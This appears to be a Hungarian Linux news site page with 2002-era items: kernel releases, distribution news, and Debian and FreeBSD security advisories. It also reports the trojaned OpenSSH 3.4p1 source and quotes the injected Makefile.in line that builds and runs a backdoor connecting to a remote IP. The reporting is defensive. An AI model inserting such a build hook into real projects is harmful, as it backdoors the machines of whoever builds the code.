Aktív fórumtémák

Tárgy Válaszok Legutóbbi beküldés Fórum Szerző
  Windows 11 version 24H2 (javítás verziója) - ez mi? 18  2025-08-17T17:09:17+0200 Microsoft Windows szilard_
  Egészségügyi dokumentumok listájának lekérése - Breakglass 408  2025-08-17T17:07:28+0200 Közösségi kerekasztal locsemege
  Squid proxy HTTPS (HSTS) oldalak blokkolása szépen 2025-08-17T16:30:32+0200 Hálózatok egyéb kisspepe
  SSD meghibásodás után sérült Windows 10 LTSC 2019 helyreállítása 2025-08-17T15:40:35+0200 Microsoft Windows djtacee
  Fejlődnek a video driverek 128  2025-08-17T15:21:00+0200 VGA locsemege
  Android Rage n+1 286  2025-08-17T12:38:16+0200 Android hnsz2002
  Miért van értelme saját szerveren futó AI-al sz*pni? (Kaotikusan sült el a GPT-5 modell bevezetése) 90  2025-08-17T12:01:26+0200 HUP cikkturkáló Ritter
  ELMŰ okos mérő kalandok 760  2025-08-17T11:10:03+0200 Elektronika, Elektromos eszközök VincentV
  [SOLVED] Milyen mobilnetet backupnak, LTE képes routerbe? 18  2025-08-17T06:50:06+0200 Hálózati eszközök wowbagger
  HUP ismert hibák listája - 2025 199  2025-08-16T22:54:44+0200 HUP trey
  IT rendszergazda (Windows / Linux / hálózat) 2025-08-16T19:24:13+0200 Állást kínál Proci85
  NIS2 tapasztalatok 65  2025-08-16T16:10:03+0200 Közösségi kerekasztal pentike
  Mi történt a Hardverker Online Kft-vel (bestmarkt.hu)? 192  2025-08-15T21:02:41+0200 Közösségi kerekasztal djtacee
  Roidmi károsultak fóruma (Roidmi csődbe ment, így nem használhatók tovább bizonyos eszközeik) 33  2025-08-15T20:29:50+0200 Közösségi kerekasztal Charybdis
  Proxmox Backup Server → BackBlaze (S3) Offisite mentés 12  2025-08-15T13:38:46+0200 Virtualizáció gyuri23
  Unaloműző online játékok és azok eredményei #2 743  2025-08-15T08:21:29+0200 Játékok trey
  "The EU wants to decrypt your private data by 2030" 45  2025-08-14T16:18:37+0200 HUP cikkturkáló zitev
  Trump elküldte az Intel főnökét 45  2025-08-14T16:15:50+0200 HUP cikkturkáló Botond
  Debrecenben keresek üveget hegeszteni tudó kisiparost. - Megoldódott. 15  2025-08-14T10:35:20+0200 Hálózatok egyéb itan
  [megoldva]Zentyal lassú webes felület 2025-08-14T09:17:05+0200 Hálózatok egyéb theadam

Yeah, holiday....

Címkék

Elmegyek nyaralni, nem leszek számítógépközelben egy hétig. Aggódni nem kell :-), szerintem bra és gyu frissíteni fogják az oldalt, ha idejük engedi. Ahova megyek ott nem lesz internet kapcsolat (világ vége), az egyedüli kapcsolatom a külvilággal a communikátorom lesz. Olvasni fogom tudni az oldalt, de postolni sajnos a mostani mobil-internet árak mellett szinte képtelenség lenne :-( (nem, nincs GPRS-em. még...)

Sebaj, egy hét múlva itt vagyok =)

Marcelo Tosatti: Linux 2.4.19

Címkék

Megjelent a legfrissebb stabil kernel, a 2.4.19-es. Változás nem történt, a release candidate 5 került végül kiadásra.

Letölthető FULL, patch.

Változások:final:

- 2.4.19-rc5 was released as 2.4.19 with no changes.


Summary of changes from v2.4.19-rc4 to v2.4.19-rc5

============================================

(02/08/01 1.662)

[PATCH] Correct openprom fix

(02/07/31 1.661)

[PATCH] Add missing check to openprom driver

(02/08/01 1.663)

[PATCH] disable READA

(02/08/01 1.664)

Change EXTRAVERSION to -rc5

MPlayer a Sharp Zaurus-ra

Ma írtam, hogy a TheKompany cég kiadott egy tkcvideo nevű programot a Sharp linux-alapú kézi gépére, amellyel akár DivX formátumú filmeket nézhetünk a kütyün. Viccből megemlítettem, hogy portolni kellene az MPlayert Zaurus-ra, mert a tkcvideo nem ingyenes, meg az MPlayer amúgy is a szívem egyik csücske ;)

Hát elkéstem a portolási felhívással. Árpi hívta fel a figyelememet arra, hogy valaki már említette az mplayer-users@ listán, hogy az MPlayer működik a Sharp Zaurus-on.Sharp


Transgaming.com: WineX 2.1 unleashed!

Címkék

A Transgaming.com tegnap bejelentette a Winex 2.1-et, mellyel lehetőségünk nyílik az eddiginél jóval több windowsra írt játékot futtani Linux alatt. A Transgamerek letölthetik (nem ingyen) a winex 2.1-et RPM, DEB, és TGZ csomagban. Az oldalon olvashatjuk a szokásos szöveget, a Transgaming fejlesztőinek sikerült a világ eddig leggyorsabban fogyó játékát, a WarCraft III-at is futtani Linux alatt a winex segítségével. Ezen kívül még olyan játékok működnek a winex új verziójával, mint a Civilization 3, Grand Theft Auto 3 a Black & White, stb. Ebben a verzióban már működik a WarCraft III-ban a video betétéek (cutscenes) lejátszása is.

Featurek:- Support for WarCraft III in OpenGL mode

- Support for Civilization III, version 1.0 and 1.07. Version 1.21 is not yet supported due to copy protection issues.

- Support for Black and White.

- Support for Grand Theft Auto 3.

- Fixes to DXGrab and XVidMode code to better support full-screen modes

- Various improvements to DirectSound and Wave audio

- Better support for DirectX version detection.

- Improved keyboard focus support for some games.

- Faster copy protection code. In some cases, copy protection wait times have been reduced by more than 50%. Other cases remain slow, however. For users of Panasonic DVD drives, be aware that a previous Panasonic-specific workaround has been removed from WineX 2.1 after testing revealed that did not appear to be necessary on recent 2.4 series Linux kernel releases.

Teljes változások logja itt.

CVS és letöltés itt.

DSA 141-1 mpack puffer túlcsordulás

Címkék

Csomag: mpack

Sebezhetőség: buffer overflow

Probléma típusa: távoli

Debian specifikus: nem




Eckehard Berns egy nem debian specifikus puffertúlcsordulást felfedezett fel a mupack programban, amit binaris - MIME dekódoláshoz használnak e-mail-ekben. Ezzel a hibával akár tetszőleges kód is lefuttatható. Azonnali frissítés javasolt...A problémát az 1.5-5potato2 csomag javítja a régi stabil disztribúcióban (potato), az 1.5-7woody2 csomag javítja az aktuális stabil disztribúcióban (woody), és az 1.5-9 csomag javítja az unstable disztribúcióban (sid).

Debian Security listán megjelent hír

Felhívás a közreműködők, cikk beküldők részére

Címkék

Hmm, már régebben is meg akartam írni ezt a dolgot, de valahogy mindig elmaradt. A mai magyar online Linux oldalak hozzáállásával és mentalitásával kapcsolatban.

Naponta nézem a külföldi, és a magyar Unix, Linux online újságokat. Itt nálunk azt vettem észre, hogy egy részük (itt felhívom a figyelmet arra, hogy tisztelet a kivételnek, és akinek nem inge...., stb, mielőtt még óriási flame lenne a dologból) ötlettelen, és nem csinál mást mint, más oldalakról szó szerint kopizza (igen-igen cut & paste) a híreket. Ezzel csak egy bajom van. Ahogy végignézem a magyar oldalakat mindenhol ugyanazt a cikket látom. Ennek semmi értelme. Nincs értelme annak, hogy egy oldalra valaki beküld egy hírt, vagy az ottani team készít egy hírt, és azt más oldalra bemásolják, beküldik.Hogy miért nincs értelme? Mert kis ország vagyunk, és mindannyian tudjuk, hogy mik azok az oldalak amit meg kell látogatni nap-mint-nap. És nagyon kellemetlen több oldalon is ugyanazokkal a cikkekkel találkozni. (Főleg úgy, hogy több oldalon keresztül van a hír idézve, és az utolsó oldalon már teljesen másról szól. Ugye ismerjük a szájról-szájra terjedő híreket?)

Ennek elkerülése végett kérek minden cikk beküldőt, hogy NE idézzen ide, és NE küldjön be ide olyan hírt, amely megjelent más magyar oldalon. Erre egyébként ki is térek az éppen formálódó site FAQ-ban a Miért nem közölted le a cikkemet? pontban. Ezzel elkerülhetővé válik az, hogy egyhangú, unalmas, és ötlettelen legyen a magyar online Linux/Unix hírszolgáltatás.

Az előző cikket azért közöltem le, mert ez a tipikus példája annak, ahogy NE küldjünk be cikket. Küldjük be esetleg az érdekes cikk címét, és a rá mutató _pontos_ URL-t. Ez bőven elég.

Azoknak az oldalaknak a figyelmébe, akik innen cikket idéznek:

Kéretik a fentieket betartani. Nem az egész cikket lemásolni, hanem egy hivatkozást tenni rá. Okom van ezt kérni. Ugyanis több alkalommal történt olyan, hogy nem szó szerint idéztek innen cikket, a kedves újságíró saját szavaival egészítette ki a hírt, más címet adott neki, és természetesen a cikk más jelentéssel is bírt ezek után. A problémát jeleztem neki, miután a hírt kijavították.

Köszönettel:

-trey

A világ legnagyobb, Grid számítógépes erőforrása

Címkék

9,2 teraflop kapacitású HP-szuperszámítógépet telepítenek az Egyesült Államokban, amely a legnagyobb Grid számítógépes erőforrás lesz a világon.A gép első teraflopnyi kapacitását augusztus végéig kötik össze a DOE Science Griddel, amelynek kiszolgálóegységei között ez lesz az első szuperszámítógép. A teljes, 9,2 teraflop kapacitás várhatóan 2003 tavaszán áll majd rendelkezésre.

A PNNL által megvásárolt HP-szuperszámítógépet az év első felében, a világ legnagyobb teljesítményű Linux-alapú szuperkomputereként ismerhették meg az érdeklődők. A párhuzamos file-rendszerrel ellátott, kiegyensúlyozott rendszer minden eddiginél nagyobb teljesítményt tesz elérhetővé a tudományos felhasználói kör számára.

A DOE Science Grid létrehozására 2001-ben, az Energiaügyi Minisztérium SciDAC programja keretében került sor. A kezdeményezésben öt kutatólaboratórium, azaz a PNNL mellett a Lawrence Berkeley National Laboratory, a National Energy Research Scientific Computing Center, az Oak Ridge National Laboratory és az Argonne National Laboratory vesz részt.

Az amerikai és külföldi intézetek nagy volumenű szimulációs és adatelemzési feladatok elvégzésére, továbbá különféle, egymástól távol eső helyszínek között elosztott, felső kategóriás számítástechnikai erőforrásokat, adatbázisokat illetve berendezéseket igénylű tudományágak - köztük a kémia, a nagy energiájú fizika, a magfúzió, valamint az élettani és klímakutatások - kísérleteinek összehangolására használják a Grid-et. Az erőforrásokat igénybe vevő tudományos felhasználói bázis is többnyire a világ különböző pontjain, elszórtan található.

A HP szuperszámítógépét adathozzáférési és -átviteli, valamint számítási műveletek végrehajtására használhatják az érintettek. A rendszerbe érkező számítási igényeket az Energiaügyi Minisztérium PNNL-nél működő tudományos felhasználói létesítménye, a William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) pályáztatás alapján rangsorolja. Elsősorban azok, az emberiség előtt álló komolyabb kihívásokra összpontosító, nagyszabású projektek számíthatnak kedvező elbírálásra, amelyek kutatócsoportok vezetésével három éven keresztül kívánják vizsgálni az érintett problémát.

forrás: www.terminal.hu

NetBSD: augusztusi hírek

Címkék

Egy maréknyi NetBSD hír:

  • Három új biztonsági figyelmeztetés
  • A NetBSD felhasználókat nem érinti az OpenSSH trójai verziója
  • Új dmover(9) kernel API a -current -ben
  • A NetBSD 1.6 jelenleg a BETA5-nél tartHárom új biztonsági figyelmeztetést tett közzé a NetBSD csapat. Ezek a SA2002-009 (OpenSSL), SA2002-010 (pppd) és a SA2002-011 (Sun RPC). Bővebb információ a bejelentésekben.

    A NetBSD team bejelentette, hogy a felhasználóiknak nem kell félniük a "trojaned" OpenSSH csomagoktól. A NetBSD szerverek soha nem tartalmazták ezeket a forrásokat. Csak azoknak kell tartaniuk a dologtól, akik manuálisan töltötték le a forrást és kikapcsolták a checksum ellenőrzést (itt volt már szó erről, _ERŐSEN ELLENJAVALLT KIKAPCSOLNI_).

    Jason Thorpe commitolt egy új kódot a NetBSD-current-be, amely az új dmover(9) kernel API-t implementálja a kernebe. Ez lehetővé teszi a kernel számára, hogy használhasson olyan hardvert amelyik fel tudja tölteni a memória egyes régióit, másolni tudja ezeket a régiókat, és műveleteket tud végrehajtani ezekkel a memóri a területekkel. Ilyen lehet például az XOR utasítás a memória különböző területein. Bővebb információ elérhető erről a current-users levlistán itt.

    A NetBSD kilencedig nagyobb kiadása jelenleg pre-release állapotba van. Az automatikus buildek napi snapshotját megtalálod ftp://releng.netbsd.org/pub/NetBSD-daily/ itt.

  • DivX a Sharp Zaurus-hoz

    A TheKompany cég kiadott egy DivX szoftvert a GNU/Linux-alapú Sharp Zaurus SL-5500 kézi mobileszközre. A program neve tkcvideo.

    The program támogatja az MPEG1, MPEG 2, MPEG 4 (DivX), MJPEG, vagy AVI filokat, és az mp1, mp2, és mp3 audio formátumokat.

    Mostantól akár filmeket is nézhetünk a PDA-nkon.

    Kép a folytatásban:tkcvideo

    Zaurus akcióban

    A Zaurus egy 128MB-os Compact Flash kártyával képes egy órányi filmet tárolni 240x320-as felbontásban. A tkcvideo mindent tud amit a "normális" lejátszók. Sajnos a program nem open source. A lejátszót a TheKompany weboldaláról lehet letölteni 15$ körüli áron. Demo verzió nem létezik belőle.

    Talán az MPlayert lehetne portolni Zaurusra? :-)

    Linus Torvalds: Linux 2.5.30

    Címkék

    Az éjjel született új fejlesztői kernel is. Linus kiadta a 2.5.30-as kernelt. A kernel számos fejlesztővel történt merge-t tartalmaz. Ezenkívül a legfontosabb változás egy komolyabb RPC bug javítása, mely NFS problémákat okozott az SMP gépeken.

    Letölthető FULL, patch.

    Változások logja itt.

    Alan Cox: Linux 2.4.19rc5-ac1

    Címkék

    Cox mester első foltja az rc5-höz megjelent. Ami jellemzi: HP merge, merge az rc5-tel, eepro frissítés, javítás gcc3-hoz, stb.

    Letölthető patch-2.4.19-rc5-ac1.gz.

    Változások:[+ indicates stuff that went to Marcelo, o stuff that has not,

    * indicates stuff that is merged in mainstream now, X stuff that proved bad and was dropped out]

    This patch contains SiS IDE updates. Usual caveats apply. The HP merge is now down to 4058 lines.

    Linux 2.4.19rc5-ac1

    o Merge with 2.4.19rc5

    o Flush the right thing in ramdisk (HP merge)

    o Merge further small hppa bits (HP merge)

    o Fix ide option breakage (Mikael Petterson)

    o Fix a JFFS2 oops case (David Woodhouse)

    o Switch 'processor id' to 'physical id' (me)

    | Keeps glibc happy until we sort out cpu numbers longer term

    o Fix incorrect marking of phys_proc_id init (David Luyer)

    o Update the experimental amd76x_pm code (Johnathan Hicks)

    o EEPro10 update (Aristeu Sergio Rozanski Filho)

    o Fix missing prototype (Christoph Hellwig)

    o Make mount hash size more sensible (Christoph Hellwig)

    o Make i386 semaphore implementation gcc3 safe (Christoph Hellwig)

    o Remove dead code in alim15x3 IDE code (me)

    o Make the i8x0 audio power up more conservative (me)

    o Enable EAPD on i8x0 audio devices (me)

    | Hopefully this will fix some of the 'silent laptop' problems

    o Fix misordering in drivers/net/Config (Willy Tarreau)

    o Fix undefined C usage in ixj (me)

    o Fix undefined C usage in se401 (me)

    o Kill __FUNCTION__ in some usb drivers (me)

    Knoppix 3.1 kiadás

    Címkék

    Megjelent a Knoppix 3.1-es verziója. A rendszer KDE 3.02, OpenOffice.org 1.0, Gimp 1.2 csomagokkal és 2.4-es kernellel van felszerelve.

    A KNOPPIX egy komplett GNU/Linux disztribúció, amely a nemrég megjelent Debian GNU/Linux 3.0 Woody terjesztésen alapul. A KNOPPIX egy bootolható CD-ről fut (live cd rendszer), és nem igényel telepítést a cél számítógépen. A terjesztés teljesen automatikus hardver detektálással, és teljes értékű KDE desktop környezettel rendelkezik. A KNOPPIX egy teljes értékű rescue rendszer.A rendszer segítségével akár TV-t nézhetünk, vagy akár CD-t is írhatunk. A KNOPPIX-ot használhatjuk Linux demo, oktatási célokra.

    Rendszerkövetelmények:

  • Intel-compatibilis CPU (i486 vagy jobb)
  • 16 MB RAM (text módban), vagy minimum 96 MB (grafikus módban KDE), egyes programok igényelhetnek akár 128 MB RAM-ot is, ezért ez az ajánlott minimum RAM konfiguráció
  • El Torito-t támogató (bootolható) CD-ROM drive, vagy boot floppy és standard CD-ROM (IDE/ATAPI vagy SCSI), standard SVGA-kompatibilis video kártya, soros, PS/2, IMPS/2-kompatibilis vagy USB egér

    Bővebb információ a project honlapján.

  • Niels Provos: OpenSSH Security Advisory: Trojaned Distribution Files

    Címkék

    Niels Provos bejelentette a trójai OpenSSH dolgot a security-announce@, misc@ és announce@ OpenBSD listákon. Mint kiderült több csomag is érintett. Az érintett verziók:

    • OpenSSH version 3.2.2p1
    • OpenSSH version 3.4p1
    • OpenSSH version 3.4

    A backdooros stuff július 30. és július 31. között került a szerverekre, és onnan kerültek át más szerverekre a normál mirrorozási folyamattal.

    Kapcsolódó cikkek:
    OpenSSH hiba ismét!
    OpenSSH trójai!

    Marcelo Tosatti: Linux 2.4.19-rc5

    Címkék

    Egy-két dolog kimaradt az rc4-ből, úgyhogy Tosatti kiadta az rc5-öt.

    Letölthető patch-2.4.19-rc5.gz.

    Változások:One of the -rc4 fixes was not correct and -rc4 missed an important SMP race "fix" on the block layer.


    Summary of changes from v2.4.19-rc4 to v2.4.19-rc5

    ============================================

    (02/08/01 1.662)

    [PATCH] Correct openprom fix

    (02/07/31 1.661)

    [PATCH] Add missing check to openprom driver

    (02/08/01 1.663)

    [PATCH] disable READA

    (02/08/01 1.664)

    Change EXTRAVERSION to -rc5

    DSA 140-1 Az új libpng csomagok javítják a puffertúlcsordulást

    Címkék

    Csomag: libpng2, libpng3

    Támadhatóság: puffer-túlcsordulás

    Probléma-típus: távoli

    Debian-specifikus: nem



    A PNG könyvtár fejlesztői kijavították a puffer-túlcsordulási hibát a progresszív olvasójában, ami akkor jön elő, ha a PNG adatfolyam több IDAT adatot tartalmaz mint amennyit az "IHDR chunk" jelez. Ilyen előkészített helytelen adatfolyamok összeomlasztják az alkalmazást, ami esetleg lehetővé teszi a támadó számra, hogy szabotáló kódot futtasson. Az olyan programok, mint a Galeon, Konqueror és számos más egyéb program használják ezeket a könyvtárakat.Hogy megtudd, hogy mely csomagok függenek ettől a könyvtártól futtasd a következő parancsokat:

        apt-cache showpkg libpng2
        apt-cache showpkg libpng3
    

    DSA 139-1 Az új super csomagok javítják a helyi root exploitot

    Címkék

    Csomag: super

    Támadhatóság: format string vulnerability

    Probléma típus: helyi

    Debian-specifikus: nem



    A GOBBLES talált egy nem biztonságos használati módot a super csomag formátumsztringjeiben. A szuper nevű program arra való, hogy megfelelő rendszer-felhasználókhoz való hozzáférst adjon az néhány felhasználónak, úgy mint a szuper nevű program. (megj. most én nem értem rendesen az eredeti angol mondatot, vagy tényleg ilyen önrekurzív hülye módon fogalmazták meg? :-)) Kihasználva ezt a formátumsztring-támadhatóságot, a helyi felhasználók jogosulatlanul root hozzáférést szerezhetnek.A problémát a 3.12.2-2.1 javítja a régi stabil disztribúcióban (potato), a 3.16.1-1.1 javítja az aktuális stabil disztribúcióban (woody), és a 3.18.0-3 javítja az unstable disztribúcióban (sid).



    Megj.: Olyan gyorsak voltunk, hogy a hír, még a debian-security archívumába se került be, de ha bekerül, vsz. ezen a linken fogod megtalálni :-)

    OpenSSH trójai!

    Címkék

    A portolható OpenSSH forráskódjában trójai kódot fedezett fel Edwin Groothuis. Az ftp.openbsd.org-on és annak tükrein elérhető fájl MD5 ellenőrzőösszege:

    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

    míg az eredeti fájlé:

    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

    Az eredetihez képest az openssh-3.4p1/openbsd-compat/Makefile.in fájl változott meg, amelyhez a következő sort adták:

    all: libopenbsd-compat.a
    + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

    A bf-test.c fájl a portolható OpenSSH forráskódjában soha nem szerepelt és a Makefile.in CVS információi is kitaláltak, így a gyanú beigazolódni látszik.
    A bf-test valójában egy shell scriptet állít elő, amely egy C forráskódot tartalmaz. A lefordított kód a 203.62.158.32-es (web.snsonline.net) IP cím 6667-es portjára kapcsolódik és távolról vezérelhetővé válik.

    OpenSSH hiba ismét!

    Címkék

    Ismét bebizonyosodott, hogy semmi sem tökeletes. Még a "javított" OpenSSH sem... Egy igen érdekes levelet lehet olvasni a freebsd-security@ levlistán. A levél írója szerint a 3.4-es OpenSSH BACKDOOR-os! Mindenki nézzen utána a kérdesnek, gyakorlatilag megint nem vagyunk biztonságban.

    Olvasd el a levelet itt.

    FreeBSD Security Advisory FreeBSD-SA-02:34.rpc

    Címkék

    Topic: Sun RPC XDR dekóder 'buffer overflow' hibát tartalmaz

    Kategória: core

    Modul: libc

    Bejelentve: 2002-07-31

    Közreműködők: ISS X-Force

    Érintett rendszerek: Az összes FreeBSD kiadás, beleértve a 4.6.1-RELEASE-p3 -at is

    Javítva:


    2002-07-31 14:45:29 UTC (RELENG_4)

    2002-07-31 14:47:02 UTC (RELENG_4_6)

    2002-07-31 14:49:18 UTC (RELENG_4_5)

    2002-07-31 14:50:18 UTC (RELENG_4_4)


    FreeBSD specifikus: nem

    A bejelentés:A bejelentés:

    =========================================

    FreeBSD-SA-02:34.rpc Security Advisory The FreeBSD Project

    Topic: Sun RPC XDR decoder contains buffer overflow

    Category: core

    Module: libc

    Announced: 2002-07-31

    Credits: ISS X-Force

    Affects: All releases of FreeBSD up to and including 4.6.1-RELEASE-p3

    Corrected: 2002-07-31 14:45:29 UTC (RELENG_4)

    2002-07-31 14:47:02 UTC (RELENG_4_6)

    2002-07-31 14:49:18 UTC (RELENG_4_5)

    2002-07-31 14:50:18 UTC (RELENG_4_4)

    FreeBSD only: NO

    I. Background

    Sun RPC is a remote procedure call framework which allows clients to invoke procedures in a server process over a network somewhat transparently. XDR is a mechanism for encoding data structures for use with RPC. NFS, NIS, and many other network services are built

    upon Sun RPC.

    The FreeBSD C runtime library (libc) contains an XDR encoder/decoder derived from Sun's RPC implementation.

    II. Problem Description

    An error in the calculation of memory needed for unpacking arrays in the XDR decoder can result in a heap buffer overflow.

    III. Impact

    Any application using Sun RPC may be vulnerable to the heap buffer overflow. Depending upon the application, this vulnerability may be exploitable and lead to arbitrary code execution.

    Though no exploits are known to exist currently, many RPC-based services run as the superuser (such as NFS, the NIS server, rpc.statd, and others) and thus this vulnerability should be considered high-risk.

    No RPC-based services are enabled by default in FreeBSD installations.

    IV. Workaround

    Do not run any RPC-based services. The RPC-based services running on a machine may be determined by:

    # rpcinfo -p

    To disable any RPC-based services at next boot, add (or change if it is already present) the following lines in /etc/rc.conf:

    portmap_enable="NO"

    nfs_client_enable="NO"

    nfs_server_enable="NO"

    nis_client_enable="NO"

    nis_server_enable="NO"

    V. Solution

    Do one of the following:

    1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p4, 4.5-RELEASE-p12, or 4.4-RELEASE-p19).

    2) To patch your present system:

    The following patch has been verified to apply to FreeBSD 4.4, 4.5, and 4.6 systems.

    a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

    # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch

    # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch.asc

    b) Execute the following commands as root:

    # cd /usr/src

    # patch

    c) Recompile the operating system as described in

    [URL:http://www.freebsd.org/doc/handbook/makeworld.html].

    Note that any statically linked applications that are not part of the base system (i.e. from the Ports Collection or other 3rd-party sources) must be recompiled if they use Sun RPC.

    All affected applications must be restarted in order to use the corrected library. Though it is not required, rebooting may be the easiest way to accomplish this.

    VI. Correction details

    The following list contains the revision numbers of each file that was corrected in FreeBSD.

    Path Revision Branch

    ----------------------------------------------------------------

    src/lib/libc/xdr/xdr_array.c

    RELENG_4 1.8.2.2

    RELENG_4_6 1.8.10.2

    RELENG_4_5 1.8.8.2

    RELENG_4_4 1.8.6.2

    src/sys/conf/newvers.sh

    RELENG_4_6 1.44.2.23.2.9

    RELENG_4_5 1.44.2.20.2.13

    RELENG_4_4 1.44.2.17.2.18

    -----------------------------------------------------------------

    VII. References

    [URL:http://online.securityfocus.com/archive/1/285308]

    [URL:http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20823]

    Linux kernel 2.5 státusz riport

    Címkék

    Hmm. Elég régen jelentkeztem a 2.5-ös kernel státusz riporttal. Lássuk csak mit dolgoztak a kernelfejlesztők az elmúlt majdnem egy hónapban.Merged

    o in 2.5.1+ Rewrite of the block IO (bio) layer (Jens Axboe)

    o in 2.5.2 Initial support for USB 2.0 (David Brownell, Greg Kroah-Hartman, etc.)

    o in 2.5.2 Per-process namespaces, late-boot cleanups (Al Viro, Manfred Spraul)

    o in 2.5.2+ New scheduler for improved scalability (Ingo Molnar)

    o in 2.5.2+ New kernel device structure (kdev_t) (Linus Torvalds, etc.)

    o in 2.5.3 IDE layer update (Andre Hedrick)

    o in 2.5.3 Support reiserfs external journal (Reiserfs team)

    o in 2.5.3 Generic ACL (Access Control List) support (Nathan Scott)

    o in 2.5.3 PnP BIOS driver (Alan Cox, Thomas Hood, Dave Jones, etc.)

    o in 2.5.3+ New driver model & unified device tree (Patrick Mochel)

    o in 2.5.4 Add preempt kernel option (Robert Love, MontaVista team)

    o in 2.5.4 Support for Next Generation POSIX Threading (NGPT team)

    o in 2.5.4+ Porting all input devices over to input API (Vojtech Pavlik, James Simmons)

    o in 2.5.5 Add ALSA (Advanced Linux Sound Architecture) (ALSA team)

    o in 2.5.5 Pagetables in highmem support (Ingo Molnar, Arjan van de Ven)

    o in 2.5.5 New architecture: AMD 64-bit (x86-64) (Andi Kleen, x86-64 Linux team)

    o in 2.5.5 New architecture: PowerPC 64-bit (ppc64) (Anton Blanchard, ppc64 team)

    o in 2.5.5+ IDE subsystem rewrite (Martin Dalecki)

    o in 2.5.6 Add JFS (Journaling FileSystem from IBM) (JFS team)

    o in 2.5.6 per_cpu infrastructure (Rusty Russell)

    o in 2.5.6 HDLC (High-level Data Link Control) update (Krzysztof Halasa)

    o in 2.5.6 smbfs Unicode and large file support (Urban Widmark)

    o in 2.5.7 New driver API for Wireless Extensions (Jean Tourrilhes)

    o in 2.5.7 Video for Linux (V4L) redesign (Gerd Knorr)

    o in 2.5.7 Futexes (Fast Lightweight Userspace Semaphores) (Rusty Russell, etc.)

    o in 2.5.7+ NAPI network interrupt mitigation (Jamal Hadi Salim, Robert Olsson, Alexey Kuznetsov)

    o in 2.5.7+ ACPI (Advanced Configuration & Power Interface) (Andy Grover, ACPI team)

    o in 2.5.8 Syscall interface for CPU task affinity (Robert Love)

    o in 2.5.8 Radix-tree pagecache (Momchil Velikov, Christoph Hellwig)

    o in 2.5.9 Smarter IRQ balancing (Ingo Molnar)

    o in 2.5.11 Replace old NTFS driver with NTFS TNG driver (Anton Altaparmakov)

    o in 2.5.11 Fast walk dcache (Hanna Linder)

    o in 2.5.11+ Rewrite of the framebuffer layer (James Simmons)

    o in 2.5.12+ Rewrite of the buffer layer (Andrew Morton)

    o in 2.5.14 Support for IDE TCQ (Tagged Command Queueing) (Jens Axboe)

    o in 2.5.14 Bluetooth support (no longer experimental!) (Maxim Krasnyansky, Bluetooth team)

    o in 2.5.17 New quota system supporting plugins (Jan Kara)

    o in 2.5.17+ Move ISDN4Linux to CAPI based interface (Kai Germaschewski, ISDN4Linux team)

    o in 2.5.18 Software suspend (to disk & RAM) (Pavel Machek)

    o in 2.5.23 More complete IEEE 802.2 stack (Arnaldo, Jay Schullist, from Procom donated code)

    o in 2.5.23+ Hotplug CPU support (Rusty Russell)

    o in 2.5.25 Faster internal kernel clock frequency (Linus Torvalds)

    o in 2.5.26 Direct pagecache BIO disk I/O (Andrew Morton)

    o in 2.5.27+ New VM with reverse mappings (Rik van Riel)

    o in 2.5.28+ Serial driver restructure (Russell King)

    o in 2.5.28 Remove the "Big IRQ lock" (Ingo Molnar)

    o in 2.5.29 Thread-Local Storage (TLS) support (Ingo Molnar)

    o in 2.5.29+ Add Linux Security Module (LSM) (LSM team)

    o in 2.5.29+ Strict address space accounting (Alan Cox)

    o in -dj Rewrite of the console layer (James Simmons)

    o in -dj New MTRR (Memory Type Range Register) driver (Patrick Mochel)

    o in -dj Add support for CPU clock/voltage scaling (Erik Mouw, Dave Jones, Russell King, Arjan van de Ven)

    o in -ac PCMCIA Zoom video support (Alan Cox)

    o in -ac Improved i2o (Intelligent Input/Ouput) layer (Alan Cox)

    o Ready Read-Copy Update (RCU) Mutual Exclusion (Dipankar Sarma, Rusty Russell, Andrea Arcangeli, LSE Team)

    o Ready Add hardware sensors drivers (lm_sensors team)

    o Ready Build option for Linux Trace Toolkit (LTT) (Karim Yaghmour)

    o Ready Remove the 2TB block device limit (Peter Chubb)

    o Ready Add User-Mode Linux (UML) (Jeff Dike)

    o Beta New kernel build system (kbuild 2.5) (Keith Owens)

    o Beta New IO scheduler (Jens Axboe)

    o Beta Add XFS (A journaling filesystem from SGI) (XFS team)

    o Beta Fix long-held locks for low scheduling latency (Andrew Morton, Robert Love, etc.)

    o Beta Per-mountpoint read-only, union-mounts, unionfs (Al Viro)

    o Beta EVMS (Enterprise Volume Management System) (EVMS team)

    o Beta Device mapper for Logical Volume Manager (LVM2) (LVM team)

    o Beta Dynamic Probes (Suparna Bhattacharya, dprobes team)

    o Beta Page table sharing (Daniel Phillips, Dave McCracken)

    o Beta ext2/ext3 online resize support (Andreas Dilger)

    o Beta UDF Write support for CD-R/RW (packet writing) (Jens Axboe, Peter Osterlund)

    o Beta Asynchronous IO (aio) support (Ben LaHaise)

    o Beta Better event logging for enterprise systems (Larry Kessler, evlog team)

    o Beta High resolution timers (George Anzinger, etc.)

    o Beta discontigmem support (Pat Gaughen, Jack Steiner, Tony Luck, etc.)

    o Beta Add new CIFS (Common Internet File System) (Steve French)

    o Beta More complete NetBEUI stack (Arnaldo Carvalho de Melo, from Procom donated code)

    o Alpha Full compliance with IPv6 (Alexey Kuznetzov, Jun Murai, Yoshifuji Hideaki, USAGI team)

    o Alpha UMSDOS (Unix under MS-DOS) Rewrite (Al Viro)

    o Alpha Scalable Statistics Counter (Ravikiran Thirumalai)

    o Alpha Linux Kernel Crash Dumps (Matt Robinson, LKCD team)

    o Alpha Add support for NFS v4 (NFS v4 team)

    o Alpha ext2/ext3 large directory support: HTree index (Daniel Phillips, Christopher Li, Ted Ts'o)

    o Alpha Remove use of the BKL (Big Kernel Lock) (Alan Cox, Robert Love, Neil Brown, Dave Hansen, etc.)

    o Alpha Zerocopy NFS (Hirokazu Takahashi)

    o Alpha Change all drivers to new driver model (All maintainers)

    o Alpha SCTP (Stream Control Transmission Protocol) (lksctp team)

